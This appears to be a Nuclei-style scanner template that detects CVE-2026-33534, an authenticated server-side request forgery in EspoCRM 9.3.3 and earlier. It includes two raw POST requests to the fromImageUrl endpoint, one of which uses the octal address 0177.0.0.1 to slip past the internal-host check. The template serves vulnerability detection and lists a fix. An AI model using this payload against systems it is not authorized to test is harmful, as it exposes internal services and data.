id: CVE-2026-33534

info:
  name: EspoCRM - Server-Side Request Forgery
  author: EntroVyx
  severity: medium
  description: |
    EspoCRM <= 9.3.3 contains an authenticated server-side request forgery caused by improper internal-host validation using alternative IPv4 formats in HostCheck::isNotInternalHost(), letting authenticated users access internal resources via the /api/v1/Attachment/fromImageUrl endpoint.
  impact: |
    Authenticated attackers can access internal network resources, potentially exposing sensitive data or internal services.
  remediation: |
    Upgrade to version 9.3.4 or later.
  reference:
    - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33534
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-33534
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: espocrm
    product: espocrm
  tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Content-Type: application/json
        Accept: application/json

        {"url":"http://127.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
        internal: true

  - raw:
      - |
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Content-Type: application/json
        Accept: application/json

        {"url":"http://0177.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"id\"", "\"field\":\"avatar\"", "\"parentType\":\"User\"", "0177.0.0.1")'
        condition: and